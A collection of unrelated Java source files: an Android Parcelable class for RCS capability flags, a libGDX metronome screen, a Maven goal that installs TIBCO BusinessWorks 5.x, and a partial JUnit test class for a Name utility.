this.mFtHttpSupported = ftHttpSupported;
}
/**
* Checks whether FT is supported.
*/
public boolean isFtSupported() {
return mFtSupported;
}
/**
* Sets FT as supported or not supported.
*/
public void setFtSupported(boolean ftSupported) {
this.mFtSupported = ftSupported;
}
/**
* Checks whether IS is supported.
*/
public boolean isIsSupported() {
return mIsSupported;
}
/**
* Sets IS as supported or not supported.
*/
public void setIsSupported(boolean isSupported) {
this.mIsSupported = isSupported;
}
/**
* Checks whether video sharing is supported during a CS call.
*/
public boolean isVsDuringCSSupported() {
return mVsDuringCSSupported;
}
/**
* Sets video sharing as supported or not supported during a CS
* call.
*/
public void setVsDuringCSSupported(boolean vsDuringCSSupported) {
this.mVsDuringCSSupported = vsDuringCSSupported;
}
/**
* Checks whether video sharing outside a voice call is
* supported.
*/
public boolean isVsSupported() {
return mVsSupported;
}
/**
* Sets video sharing as supported or not supported.
*/
public void setVsSupported(boolean vsSupported) {
this.mVsSupported = vsSupported;
}
/**
* Checks whether social presence is supported.
*/
public boolean isSpSupported() {
return mSpSupported;
}
/**
* Sets social presence as supported or not supported.
*/
public void setSpSupported(boolean spSupported) {
this.mSpSupported = spSupported;
}
/**
* Checks whether capability discovery via presence is
* supported.
*/
public boolean isCdViaPresenceSupported() {
return mCdViaPresenceSupported;
}
/**
* Sets capability discovery via presence as supported or not
* supported.
*/
public void setCdViaPresenceSupported(boolean cdViaPresenceSupported) {
this.mCdViaPresenceSupported = cdViaPresenceSupported;
}
/**
* Checks whether IP voice call is supported.
*/
public boolean isIpVoiceSupported() {
return mIpVoiceSupported;
}
/**
* Sets IP voice call as supported or not supported.
*/
public void setIpVoiceSupported(boolean ipVoiceSupported) {
this.mIpVoiceSupported = ipVoiceSupported;
}
/**
* Checks whether IP video call is supported.
*/
public boolean isIpVideoSupported() {
return mIpVideoSupported;
}
/**
* Sets IP video call as supported or not supported.
*/
public void setIpVideoSupported(boolean ipVideoSupported) {
this.mIpVideoSupported = ipVideoSupported;
}
/**
* Checks whether Geo location Pull using File Transfer is
* supported.
*/
public boolean isGeoPullFtSupported() {
return mGeoPullFtSupported;
}
/**
* Sets Geo location Pull using File Transfer as supported or
* not supported.
*/
public void setGeoPullFtSupported(boolean geoPullFtSupported) {
this.mGeoPullFtSupported = geoPullFtSupported;
}
/**
* Checks whether Geo Pull is supported.
*/
public boolean isGeoPullSupported() {
return mGeoPullSupported;
}
/**
* Sets Geo Pull as supported or not supported.
*/
public void setGeoPullSupported(boolean geoPullSupported) {
this.mGeoPullSupported = geoPullSupported;
}
/**
* Checks whether Geo Push is supported.
*/
public boolean isGeoPushSupported() {
return mGeoPushSupported;
}
/**
* Sets Geo Push as supported or not supported.
*/
public void setGeoPushSupported(boolean geoPushSupported) {
this.mGeoPushSupported = geoPushSupported;
}
/**
* Checks whether short messaging is supported.
*/
public boolean isSmSupported() {
return mSmSupported;
}
/**
* Sets short messaging as supported or not supported.
*/
public void setSmSupported(boolean smSupported) {
this.mSmSupported = smSupported;
}
/**
* Checks whether store/forward and group chat are supported.
*/
public boolean isFullSnFGroupChatSupported() {
return mFullSnFGroupChatSupported;
}
public boolean isRcsIpVoiceCallSupported() {
return mRcsIpVoiceCallSupported;
}
public boolean isRcsIpVideoCallSupported() {
return mRcsIpVideoCallSupported;
}
public boolean isRcsIpVideoOnlyCallSupported() {
return mRcsIpVideoOnlyCallSupported;
}
/**
* Sets store/forward and group chat supported or not supported.
*/
public void setFullSnFGroupChatSupported(boolean fullSnFGroupChatSupported) {
this.mFullSnFGroupChatSupported = fullSnFGroupChatSupported;
}
public void setRcsIpVoiceCallSupported(boolean rcsIpVoiceCallSupported) {
this.mRcsIpVoiceCallSupported = rcsIpVoiceCallSupported;
}
public void setRcsIpVideoCallSupported(boolean rcsIpVideoCallSupported) {
this.mRcsIpVideoCallSupported = rcsIpVideoCallSupported;
}
public void setRcsIpVideoOnlyCallSupported(boolean rcsIpVideoOnlyCallSupported) {
this.mRcsIpVideoOnlyCallSupported = rcsIpVideoOnlyCallSupported;
}
/** Gets the list of supported extensions. */
public String[] getExts() {
return mExts;
}
/** Sets the list of supported extensions. */
public void setExts(String[] exts) {
this.mExts = exts;
}
/** Gets the time stamp for when to query again. */
public long getCapTimestamp() {
return mCapTimestamp;
}
/** Sets the time stamp for when to query again. */
public void setCapTimestamp(long capTimestamp) {
this.mCapTimestamp = capTimestamp;
}
public int describeContents() {
// TODO Auto-generated method stub
return 0;
}
public void writeToParcel(Parcel dest, int flags) {
dest.writeInt(mImSupported ? 1 : 0);
dest.writeInt(mFtSupported ? 1 : 0);
dest.writeInt(mFtThumbSupported ? 1 : 0);
dest.writeInt(mFtSnFSupported ? 1 : 0);
dest.writeInt(mFtHttpSupported ? 1 : 0);
dest.writeInt(mIsSupported ? 1 : 0);
dest.writeInt(mVsDuringCSSupported ? 1 : 0);
dest.writeInt(mVsSupported ? 1 : 0);
dest.writeInt(mSpSupported ? 1 : 0);
dest.writeInt(mCdViaPresenceSupported ? 1 : 0);
dest.writeInt(mIpVoiceSupported ? 1 : 0);
dest.writeInt(mIpVideoSupported ? 1 : 0);
dest.writeInt(mGeoPullFtSupported ? 1 : 0);
dest.writeInt(mGeoPullSupported ? 1 : 0);
dest.writeInt(mGeoPushSupported ? 1 : 0);
dest.writeInt(mSmSupported ? 1 : 0);
dest.writeInt(mFullSnFGroupChatSupported ? 1 : 0);
dest.writeInt(mRcsIpVoiceCallSupported ? 1 : 0);
dest.writeInt(mRcsIpVideoCallSupported ? 1 : 0);
dest.writeInt(mRcsIpVideoOnlyCallSupported ? 1 : 0);
dest.writeStringArray(mExts);
dest.writeLong(mCapTimestamp);
}
public static final Parcelable.Creator<CapInfo> CREATOR = new Parcelable.Creator<CapInfo>() {
public CapInfo createFromParcel(Parcel source) {
return new CapInfo(source);
}
public CapInfo[] newArray(int size) {
return new CapInfo[size];
}
};
private CapInfo(Parcel source) {
readFromParcel(source);
}
public void readFromParcel(Parcel source) {
      mImSupported = source.readInt() != 0;
      mFtSupported = source.readInt() != 0;
      mFtThumbSupported = source.readInt() != 0;
      mFtSnFSupported = source.readInt() != 0;
      mFtHttpSupported = source.readInt() != 0;
      mIsSupported = source.readInt() != 0;
      mVsDuringCSSupported = source.readInt() != 0;
      mVsSupported = source.readInt() != 0;
      mSpSupported = source.readInt() != 0;
      mCdViaPresenceSupported = source.readInt() != 0;
      mIpVoiceSupported = source.readInt() != 0;
      mIpVideoSupported = source.readInt() != 0;
      mGeoPullFtSupported = source.readInt() != 0;
      mGeoPullSupported = source.readInt() != 0;
      mGeoPushSupported = source.readInt() != 0;
      mSmSupported = source.readInt() != 0;
      mFullSnFGroupChatSupported = source.readInt() != 0;
      mRcsIpVoiceCallSupported = source.readInt() != 0;
      mRcsIpVideoCallSupported = source.readInt() != 0;
      mRcsIpVideoOnlyCallSupported = source.readInt() != 0;
mExts = source.createStringArray();
mCapTimestamp = source.readLong();
}
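   /*
    * Editor's note: writeToParcel and readFromParcel serialize fields positionally, so any new
    * capability flag must be written and read in exactly the same order. A minimal round trip,
    * assuming standard android.os.Parcel usage:
    *
    *     Parcel p = Parcel.obtain();
    *     capInfo.writeToParcel(p, 0);
    *     p.setDataPosition(0);
    *     CapInfo copy = CapInfo.CREATOR.createFromParcel(p);
    *     p.recycle();
    */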
}
|
|
package com.inja.tempogdx.screens;
import com.badlogic.gdx.Gdx;
import com.badlogic.gdx.Screen;
import com.badlogic.gdx.math.Interpolation;
import com.badlogic.gdx.math.MathUtils;
import com.badlogic.gdx.scenes.scene2d.Action;
import com.badlogic.gdx.scenes.scene2d.Actor;
import com.badlogic.gdx.scenes.scene2d.InputEvent;
import com.badlogic.gdx.scenes.scene2d.Stage;
import com.badlogic.gdx.scenes.scene2d.actions.Actions;
import com.badlogic.gdx.scenes.scene2d.ui.*;
import com.badlogic.gdx.scenes.scene2d.utils.ActorGestureListener;
import com.badlogic.gdx.scenes.scene2d.utils.ChangeListener;
import com.badlogic.gdx.scenes.scene2d.utils.ClickListener;
import com.badlogic.gdx.utils.Array;
import com.badlogic.gdx.utils.viewport.Viewport;
import com.inja.tempogdx.Constants;
import com.inja.tempogdx.metronome.BeatEventListener;
import com.inja.tempogdx.metronome.Metronome;
import com.inja.tempogdx.metronome.TapTempoCalculator;
import com.inja.tempogdx.utilities.Assets;
import com.inja.tempogdx.metronome.BpmNameConverter;
import com.inja.tempogdx.utilities.SkinFactory;
public class MainScreen implements Screen {
private final Stage stage;
private final Metronome metronome;
private final TapTempoCalculator tapTempoCalculator;
private ImageButton startButton;
private Slider slider;
private Label bpmLabel;
private Label bpmNameLabel;
private Array<Image> beatIndicators = new Array<>();
private int currentBeatIndicator = -1;
private MainScreenDelegate delegate;
private Table table;
private boolean firstShow = true;
private ImageButton infoButton;
private Integer margin;
public MainScreen(Viewport viewport, MainScreenDelegate delegate) {
this.delegate = delegate;
metronome = new Metronome();
tapTempoCalculator = new TapTempoCalculator(Constants.NUMBER_OF_TAPS, Constants.MIN_BPM);
stage = new Stage(viewport);
createLayout();
}
private void createLayout() {
Skin skin = SkinFactory.create();
int buttonHeight = skin.get("button-height", Integer.class);
margin = skin.get("margin", Integer.class);
final int uiWidth = skin.get("ui-width", Integer.class);
//Main Table
table = new Table(skin);
stage.addActor(table);
table.center();
table.setWidth(uiWidth);
table.setHeight(stage.getHeight());
table.setX(stage.getWidth() / 2 - table.getWidth() / 2);
//BPM Table
Table bpmTable = new Table();
bpmTable.background(skin.getDrawable("list"));
bpmLabel = new Label(Integer.toString(metronome.getBpm()), skin, "big");
bpmTable.add(bpmLabel).height(20).padTop(margin).row();
bpmNameLabel = new Label(BpmNameConverter.getName(metronome.getBpm()), skin, "small");
bpmTable.add(bpmNameLabel).padTop(margin);
table.add(bpmTable).colspan(2).height(120).fillX().expandX().row();
//Tap Tempo Button
ImageButton tapButton = new ImageButton(skin, "tap");
tapButton.addListener(new ActorGestureListener(){
@Override
public void touchDown(InputEvent event, float x, float y, int pointer, int button) {
Integer bpm = tapTempoCalculator.tap();
if (bpm != null) setBpm(bpm);
}
});
table.add(tapButton).colspan(2).height(buttonHeight).padTop(margin).fillX().expandX().row();
//Tempo Slider
slider = new Slider(Constants.MIN_BPM, Constants.MAX_BPM, 1, false, skin);
slider.setValue(metronome.getBpm());
slider.setWidth(stage.getWidth() - 20);
slider.addListener(new ChangeListener() {
@Override
public void changed(ChangeEvent event, Actor actor) {
setBpm((int) slider.getValue());
}
});
table.add(slider).padTop(margin).colspan(2).fillX().expandX().row();
//Increase/Decrease Buttons
final ImageButton slowerButton = new ImageButton(skin, "slower");
slowerButton.addListener(new MetronomeButtonGestureListener(-Constants.BIG_INCREMENT, -1));
table.add(slowerButton).height(buttonHeight).padTop(margin).padRight(10).width((table.getWidth() - 20) / 2);
ImageButton fasterButton = new ImageButton(skin, "faster");
fasterButton.addListener(new MetronomeButtonGestureListener(Constants.BIG_INCREMENT, 1));
table.add(fasterButton).height(buttonHeight).padTop(margin).padLeft(10).width((table.getWidth() - 20) / 2).row();
//Start/Stop Button
startButton = new ImageButton(skin, "play");
startButton.addListener(new ClickListener() {
@Override
public void clicked(InputEvent event, float x, float y) {
toggleMetronome();
}
});
table.add(startButton).height(buttonHeight).padTop(20).colspan(2).fillX().expandX().row();
//Beat Indicator
Table indicatorTable = new Table();
indicatorTable.background(skin.getDrawable("list"));
for (int i = 0; i < 4; i++) {
Image image = new Image(Assets.getDrawable("beatOff"));
beatIndicators.add(image);
indicatorTable.add(image).pad(0, margin, 0, margin).width(20).height(20);
}
table.add(indicatorTable).colspan(2).padTop(20).height(50).fillX().expandX().row();
//Info Button
infoButton = new ImageButton(skin, "info");
infoButton.setWidth(40);
infoButton.setHeight(40);
infoButton.setX(stage.getWidth() - margin - infoButton.getWidth());
infoButton.setY(stage.getHeight() - margin - infoButton.getHeight());
infoButton.addListener(new ClickListener() {
@Override
public void clicked(InputEvent event, float x, float y) {
infoButton.addAction(Actions.moveBy(0, margin + infoButton.getHeight(), 0.2f, Interpolation.exp5In));
table.addAction(Actions.sequence(
Actions.moveBy(-stage.getWidth(), 0, 0.2f, Interpolation.exp5In),
new Action() {
@Override
public boolean act(float delta) {
delegate.infoClicked();
return true;
}
}
));
}
});
stage.addActor(infoButton);
//Metronome Beat Event
metronome.addListener(new BeatEventListener() {
@Override
public void onBeat(BeatEvent event) {
if (currentBeatIndicator >= 0 && currentBeatIndicator < beatIndicators.size)
beatIndicators.get(currentBeatIndicator).setDrawable(Assets.getDrawable("beatOff"));
currentBeatIndicator++;
if (currentBeatIndicator == beatIndicators.size) currentBeatIndicator = 0;
Assets.getSound(currentBeatIndicator == 0 ? "clickFirst" : "click").play();
beatIndicators.get(currentBeatIndicator).setDrawable(Assets.getDrawable("beatOn"));
}
});
}
private void toggleMetronome() {
if (startButton.isChecked()) {
startMetronome();
} else {
stopMetronome();
}
}
private void startMetronome() {
metronome.start();
}
private void stopMetronome() {
if (currentBeatIndicator >= 0 && currentBeatIndicator < beatIndicators.size) {
beatIndicators.get(currentBeatIndicator).setDrawable(Assets.getDrawable("beatOff"));
}
currentBeatIndicator = -1;
metronome.stop();
}
private void setBpm(int value) {
value = MathUtils.clamp(value, Constants.MIN_BPM, Constants.MAX_BPM);
metronome.setBpm(value);
slider.setValue(value);
bpmLabel.setText(Integer.toString(metronome.getBpm()));
bpmNameLabel.setText(BpmNameConverter.getName(metronome.getBpm()));
}
@Override
public void show() {
Gdx.input.setInputProcessor(stage);
if (firstShow) {
firstShow = false;
return;
}
table.addAction(Actions.moveBy(stage.getWidth(), 0, 0.2f, Interpolation.exp5Out));
infoButton.addAction(Actions.moveBy(0, -(margin + infoButton.getHeight()), 0.3f, Interpolation.exp5Out));
}
@Override
public void render(float delta) {
stage.act(delta);
stage.draw();
}
@Override
public void resize(int width, int height) {
}
@Override
public void pause() {
stopMetronome();
}
@Override
public void resume() {
}
@Override
public void hide() {
}
@Override
public void dispose() {
stage.dispose();
metronome.stop();
}
private class MetronomeButtonGestureListener extends ActorGestureListener {
private int bigIncrement;
private int smallIncrement;
MetronomeButtonGestureListener(int bigIncrement, int smallIncrement) {
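      // super args (assumed libGDX ActorGestureListener order): halfTapSquareSize,
      // tapCountInterval, longPressDuration, maxFlingDelay -- so a long press (0.5s)
      // applies the big increment and a tap applies the small one.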
super(20, 0.4f, 0.5f, 0.15f);
this.bigIncrement = bigIncrement;
this.smallIncrement = smallIncrement;
}
public boolean longPress(Actor actor, float x, float y) {
Gdx.input.vibrate(10);
setBpm(metronome.getBpm() + bigIncrement);
return true;
}
public void tap(InputEvent event, float x, float y, int count, int button) {
setBpm(metronome.getBpm() + smallIncrement);
}
}
public interface MainScreenDelegate {
void infoClicked();
}
}
|
|
/**
* (C) Copyright 2016-2017 teecube
* (http://teecu.be) and others.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package t3.toe.installer.installers;
import java.io.File;
import java.util.ArrayList;
import java.util.List;
import java.util.Properties;
import org.apache.maven.plugin.MojoExecutionException;
import org.apache.maven.plugin.MojoFailureException;
import t3.plugin.annotations.Mojo;
import t3.plugin.annotations.Parameter;
import t3.toe.installer.CommonInstaller;
import t3.toe.installer.InstallerMojosInformation;
/**
* <p>
* This goal installs the TIBCO BusinessWorks 5.x product from an official
* archive to a target environment.
* </p>
*
* <p>
 * If the target environment already contains the dependency products
 * (RendezVous, TRA), only TIBCO BusinessWorks 5.x is installed; otherwise,
 * the plugin will look for the dependencies to install and call the corresponding
 * goals (see <a href="rv-install-mojo.html">rv-install goal</a> and
 * <a href="./tra-install-mojo.html">tra-install goal</a>).
* </p>
*
* @author Mathieu Debove <[email protected]>
*
*/
@Mojo(name = "bw5-install", requiresProject = false)
public class BW5InstallerMojo extends CommonInstaller {
@Parameter(property = InstallerMojosInformation.BW5.installationPackage, defaultValue = "${" + InstallerMojosInformation.installationPackageDirectory + "}/${tibco.bw5.installation.package.regex}")
private File installationPackage;
@Parameter(property = InstallerMojosInformation.BW5.installationPackageRegex, defaultValue = InstallerMojosInformation.BW5.installationPackageRegex_default)
private String installationPackageRegex;
@Parameter(property = InstallerMojosInformation.BW5.installationPackageRegexArchGroupIndex, defaultValue = InstallerMojosInformation.BW5.installationPackageRegexArchGroupIndex_default)
private Integer installationPackageRegexArchGroupIndex;
@Parameter(property = InstallerMojosInformation.BW5.installationPackageRegexOsGroupIndex, defaultValue = InstallerMojosInformation.BW5.installationPackageRegexOsGroupIndex_default)
private Integer installationPackageRegexOsGroupIndex;
@Parameter(property = InstallerMojosInformation.BW5.installationPackageRegexVersionGroupIndex, defaultValue = InstallerMojosInformation.BW5.installationPackageRegexVersionGroupIndex_default)
private Integer installationPackageRegexVersionGroupIndex;
@Parameter(property = InstallerMojosInformation.BW5.installationPackageVersion, defaultValue = "")
private String installationPackageVersion;
@Parameter(property = InstallerMojosInformation.BW5.installationPackageVersionMajorMinor, defaultValue = "")
private String installationPackageVersionMajorMinor;
@Parameter(property = InstallerMojosInformation.BW5.remoteInstallationPackageGroupId, defaultValue = InstallerMojosInformation.BW5.remoteInstallationPackageGroupId_default, description = InstallerMojosInformation.BW5.remoteInstallationPackageGroupId_description)
protected String remoteInstallationPackageGroupId;
@Parameter(property = InstallerMojosInformation.BW5.remoteInstallationPackageArtifactId, defaultValue = InstallerMojosInformation.BW5.remoteInstallationPackageArtifactId_default, description = InstallerMojosInformation.BW5.remoteInstallationPackageArtifactId_description)
protected String remoteInstallationPackageArtifactId;
@Parameter(property = InstallerMojosInformation.BW5.remoteInstallationPackageVersion, defaultValue = "", description = InstallerMojosInformation.BW5.remoteInstallationPackageVersion_description)
protected String remoteInstallationPackageVersion;
@Parameter(property = InstallerMojosInformation.BW5.remoteInstallationPackageClassifier, defaultValue = "", description = InstallerMojosInformation.BW5.remoteInstallationPackageClassifier_description)
protected String remoteInstallationPackageClassifier;
@Override
public List<String> getDependenciesGoals() {
List<String> dependenciesGoals = new ArrayList<String>();
dependenciesGoals.add(InstallerMojosInformation.pluginPrefix + "rv-install");
dependenciesGoals.add(InstallerMojosInformation.pluginPrefix + "tra-install");
return dependenciesGoals;
}
@Override
public void execute() throws MojoExecutionException, MojoFailureException {
if (getCreateNewEnvironment()) {
_isDependency = true;
// install the dependency products into the target environment first: Rendezvous (installRV), then TRA (installTRA)
installRV();
this.createNewEnvironment = false;
_createNewEnvironment = createNewEnvironment; // forward to next dependency
this.removeExistingEnvironment = false;
_removeExistingEnvironment = removeExistingEnvironment;
if (_environmentName != null && this.environmentName == null) {
this.environmentName = _environmentName;
}
installTRA();
}
_isDependency = false;
super.execute();
}
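/*
 * Editor's note (added for clarity, not part of the original source): when a new environment is requested,
 * execute() first runs the dependency installers itself via installRV() and installTRA(), forwarding the
 * environment name and the createNewEnvironment/removeExistingEnvironment flags through the underscore-prefixed
 * fields (presumably inherited from CommonInstaller) so the chained installers target the same environment,
 * and only then delegates to super.execute() for the BW5 installation proper.
 */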
@Override
public File getInstallationPackage() throws MojoExecutionException {
if (installationPackage == null || !installationPackage.exists()) {
installationPackage = findInstallationPackage();
}
return installationPackage;
}
@Override
public String getInstallationPackageRegex() {
return installationPackageRegex;
}
@Override
public Integer getInstallationPackageArchGroupIndex() {
return installationPackageRegexArchGroupIndex;
}
@Override
public Integer getInstallationPackageOsGroupIndex() {
return installationPackageRegexOsGroupIndex;
}
@Override
public Integer getInstallationPackageVersionGroupIndex() {
return installationPackageRegexVersionGroupIndex;
}
@Override
public String getInstallationPackagePropertyName() {
return InstallerMojosInformation.BW5.installationPackage;
}
@Override
public String getInstallationPackageVersionPropertyName() {
return InstallerMojosInformation.BW5.installationPackageVersion;
}
@Override
public String getInstallationPackageVersionMajorMinorPropertyName() {
return InstallerMojosInformation.BW5.installationPackageVersionMajorMinor;
}
@Override
public String getInstallationPackageArchPropertyName() {
return InstallerMojosInformation.BW6.installationPackageArch;
}
@Override
public String getInstallationPackageOsPropertyName() {
return InstallerMojosInformation.BW6.installationPackageOs;
}
@Override
public String getInstallationPackageVersionMajorMinor() {
return installationPackageVersionMajorMinor;
}
@Override
public void setInstallationPackageVersionMajorMinor(String version) {
this.installationPackageVersionMajorMinor = version;
}
@Override
public String getRemotePackageGroupId() {
return remoteInstallationPackageGroupId;
}
@Override
public String getRemotePackageArtifactId() {
return remoteInstallationPackageArtifactId;
}
@Override
public String getRemotePackageVersion() {
return remoteInstallationPackageVersion;
}
@Override
public String getRemotePackageClassifier() {
return remoteInstallationPackageClassifier;
}
@Override
public boolean hasDependencies() {
return true;
}
@Override
public boolean dependenciesExist() throws MojoExecutionException {
return getInstallationRoot() != null && getInstallationRoot().exists() && new File(getInstallationRoot(), "tra").exists();
}
@Override
public boolean installationExists() throws MojoExecutionException {
return getInstallationRoot() != null && getInstallationRoot().exists() && new File(getInstallationRoot(), "bw/" + getInstallationPackageVersionMajorMinor()).exists();
}
@Override
public void setProperties(Properties props) {
if (props == null) {
return;
}
}
@Override
public String getProductName() {
return "TIBCO BusinessWorks 5.x";
}
}
|
|
package test.integration;
import static java.util.Arrays.asList;
import static java.util.Collections.emptyList;
import static java.util.Collections.singletonList;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertFalse;
import static org.junit.jupiter.api.Assertions.assertNull;
import static org.junit.jupiter.api.Assertions.assertSame;
import static org.junit.jupiter.api.Assertions.assertThrows;
import static org.junit.jupiter.api.Assertions.assertTrue;
import com.github.sormuras.beethoven.Compilation;
import com.github.sormuras.beethoven.Name;
import java.math.BigInteger;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.Objects;
import java.util.Set;
import javax.annotation.processing.AbstractProcessor;
import javax.annotation.processing.RoundEnvironment;
import javax.annotation.processing.SupportedAnnotationTypes;
import javax.annotation.processing.SupportedSourceVersion;
import javax.lang.model.SourceVersion;
import javax.lang.model.element.TypeElement;
import javax.tools.JavaFileObject;
import org.junit.jupiter.api.Test;
class NameTests {
@SupportedAnnotationTypes({"X", "x.X"})
@SupportedSourceVersion(SourceVersion.RELEASE_8)
static class ElementNameProcessor extends AbstractProcessor {
final List<Name> all = new ArrayList<>();
@Override
public boolean process(Set<? extends TypeElement> annotations, RoundEnvironment roundEnv) {
TypeElement tex = processingEnv.getElementUtils().getTypeElement("X");
if (tex != null) {
roundEnv.getElementsAnnotatedWith(tex).forEach(e -> all.add(Name.name(e)));
}
tex = processingEnv.getElementUtils().getTypeElement("x.X");
if (tex != null) {
roundEnv.getElementsAnnotatedWith(tex).forEach(e -> all.add(Name.name(e)));
}
return false;
}
}
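/*
 * Note (added for clarity, not part of the original source): the processor above collects a Name for every
 * element annotated with "X" or "x.X" during annotation processing. The elementInUnnamedPackage and
 * elementInNamedPackage tests below compile small sources in memory through Compilation.compile and then
 * assert on the names the processor collected.
 */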
@Test
void array() {
assertEquals("", Name.name(int[][].class).packageName());
assertEquals("int[][]", Name.name(int[][].class).canonical());
assertEquals("int[][]", Name.name(int[][].class).simpleNames());
assertEquals("java.lang", Name.name(Byte[][].class).packageName());
assertEquals("java.lang.Byte[][]", Name.name(Byte[][].class).canonical());
assertEquals("Byte[][]", Name.name(Byte[][].class).simpleNames());
}
@Test
void cast() throws Exception {
Name name = Name.reflect(Objects.class, "hash");
assertNull(Name.cast(null));
assertSame(name, Name.cast(name));
assertEquals(Name.name(Object.class), Name.cast(Object.class));
assertEquals(Name.name(Thread.State.BLOCKED), Name.cast(Thread.State.BLOCKED));
assertEquals(Name.name("abc", "X"), Name.cast(new String[] {"abc", "X"}));
assertEquals(Name.name("abc", "X"), Name.cast(asList("abc", "X")));
assertEquals(Name.name(Math.class.getField("PI")), Name.cast(Math.class.getField("PI")));
assertThrows(IllegalArgumentException.class, () -> Name.cast(BigInteger.ZERO));
}
@Test
void elementInUnnamedPackage() {
JavaFileObject a = Compilation.source("A", "@X class A {}");
JavaFileObject x = Compilation.source("X", "@interface X {}");
ElementNameProcessor p = new ElementNameProcessor();
Compilation.compile(null, emptyList(), singletonList(p), asList(a, x));
assertEquals(1, p.all.size());
assertEquals(Name.name("A"), p.all.get(0));
}
@Test
void elementInNamedPackage() {
JavaFileObject a = Compilation.source("x.A", "package x; @x.X class A {}");
JavaFileObject x = Compilation.source("x.X", "package x; @interface X {}");
ElementNameProcessor p = new ElementNameProcessor();
Compilation.compile(null, emptyList(), singletonList(p), asList(a, x));
assertEquals(1, p.all.size());
assertEquals(Name.name("x", "A"), p.all.get(0));
}
@Test
void enclosed() {
Name.name(void.class);
Name state = Name.name(Thread.State.class);
assertEquals("java.lang.Thread.State", state.canonical());
assertTrue(state.isEnclosed());
assertTrue(state.isJavaLangPackage());
Name thread = state.enclosing();
assertEquals("java.lang.Thread", thread.canonical());
assertTrue(thread.isEnclosed());
assertTrue(thread.isJavaLangPackage());
Name lang = thread.enclosing();
assertEquals("java.lang", lang.canonical());
assertTrue(lang.isEnclosed());
assertTrue(lang.isJavaLangPackage());
Name java = lang.enclosing();
assertEquals("java", java.canonical());
assertFalse(java.isEnclosed());
assertFalse(java.isJavaLangPackage());
assertThrows(IllegalStateException.class, java::enclosing);
}
@Test
void field() {
assertEquals("java.lang.Math.PI", Name.reflect(Math.class, "PI").canonical());
assertThrows(Error.class, () -> Name.reflect(Object.class, "PI"));
assertThrows(Error.class, () -> Name.reflect(Class.class, "PO"));
}
@Test
void equalsAndHashcode() {
assertEquals(Name.name(byte.class), new Name(0, singletonList("byte")));
assertEquals(Name.name(Object.class), Name.name("java", "lang", "Object"));
assertEquals(Name.name(Objects.class), Name.name("java", "util", "Objects"));
assertEquals(Name.name(Thread.class), Name.name("java", "lang", "Thread"));
assertEquals(Name.name(Thread.State.class), Name.name("java", "lang", "Thread", "State"));
// same instance
Name integer = Name.name(int.class);
assertEquals(integer, integer);
// falsify
// noinspection ObjectEqualsNull
assertFalse(Name.name(byte.class).equals(null));
Object byteClass = byte.class; // bypass EqualsBetweenInconvertibleTypes "error"
assertFalse(Name.name(byte.class).equals(byteClass));
assertFalse(Name.name(byte.class).equals(new Name(0, asList("some", "byte"))));
}
@Test
void name() {
assertEquals("A", Name.name("A").canonical());
assertEquals("", Name.name("A").packageName());
assertEquals("A", Name.name("A").simpleNames());
assertEquals("A", Name.name("A").lastName());
assertEquals(1, Name.name("A").size());
assertEquals("a", Name.name("a").canonical());
assertEquals("a", Name.name("a").packageName());
assertEquals("", Name.name("a").simpleNames());
assertEquals("a", Name.name("a").lastName());
assertEquals("not present", Name.name("a").topLevelName().orElse("not present"));
assertEquals("a.b", Name.name("a", "b").canonical());
assertEquals("a.b", Name.name("a", "b").packageName());
assertEquals("", Name.name("a", "b").simpleNames());
assertEquals("b", Name.name("a", "b").lastName());
assertEquals("a.b.C", Name.name("a", "b", "C").canonical());
assertEquals("a.b", Name.name("a", "b", "C").packageName());
assertEquals("C", Name.name("a", "b", "C").simpleNames());
assertEquals("C", Name.name("a", "b", "C").lastName());
assertEquals(3, Name.name("a", "b", "C").size());
assertEquals("java.lang.Object", Name.name(Object.class).canonical());
assertEquals("java.lang", Name.name(Object.class).packageName());
assertEquals("Object", Name.name(Object.class).simpleNames());
assertEquals("Object", Name.name(Object.class).lastName());
assertEquals("Object", Name.name(Object.class).topLevelName().orElse("FAIL!"));
assertTrue(Name.name(Object.class).isJavaLangObject());
assertEquals("java.lang.Thread.State.NEW", Name.name(Thread.State.NEW).canonical());
assertEquals("java.lang", Name.name(Thread.State.NEW).packageName());
assertEquals("Thread.State.NEW", Name.name(Thread.State.NEW).simpleNames());
assertEquals("NEW", Name.name(Thread.State.NEW).lastName());
assertEquals("Thread", Name.name(Thread.State.NEW).topLevelName().orElse("FAIL!"));
assertFalse(Name.name(Thread.State.NEW).isJavaLangObject());
assertEquals(5, Name.name(Thread.State.NEW).size());
assertEquals("a.b.C", Name.name("a", "b", "C").canonical());
assertEquals("a.b.C", Name.name("a.b.C").canonical());
assertThrows(AssertionError.class, () -> new Name(-1, singletonList("a")));
assertThrows(AssertionError.class, () -> new Name(2, singletonList("a")));
}
@Test
void nameOfLocalClass() {
class Local {}
assertEquals("Local", Name.name(Local.class).canonical());
assertEquals("", Name.name(Local.class).packageName());
assertEquals("Local", Name.name(Local.class).simpleNames());
assertEquals("Local", Name.name(Local.class).lastName());
assertEquals("Local", Name.name(Local.class).topLevelName().orElse("FAIL!"));
}
@Test
void nameOfAnonymousClassFails() {
assertThrows(IllegalArgumentException.class, () -> Name.name(new Cloneable() {}.getClass()));
}
@Test
void primitive() {
assertEquals("boolean", Name.name(boolean.class).canonical());
assertEquals("byte", Name.name(byte.class).canonical());
assertEquals("char", Name.name(char.class).canonical());
assertEquals("double", Name.name(double.class).canonical());
assertEquals("float", Name.name(float.class).canonical());
assertEquals("int", Name.name(int.class).canonical());
assertEquals("long", Name.name(long.class).canonical());
assertEquals("short", Name.name(short.class).canonical());
assertEquals("void", Name.name(void.class).canonical());
}
@Test
void string() {
assertEquals("Name{/void}", Name.name(void.class).toString());
assertEquals("Name{/int}", Name.name(int.class).toString());
assertEquals("Name{/int[]}", Name.name(int[].class).toString());
assertEquals("Name{/int[][]}", Name.name(int[][].class).toString());
assertEquals("Name{java.lang/Thread.State[]}", Name.name(Thread.State[].class).toString());
assertEquals("Name{java.lang/Thread.State.NEW}", Name.name(Thread.State.NEW).toString());
}
@Test
void memberRef() {
assertTrue(Name.name(Arrays.asList("a", "b", "C", "d")).isMemberReference());
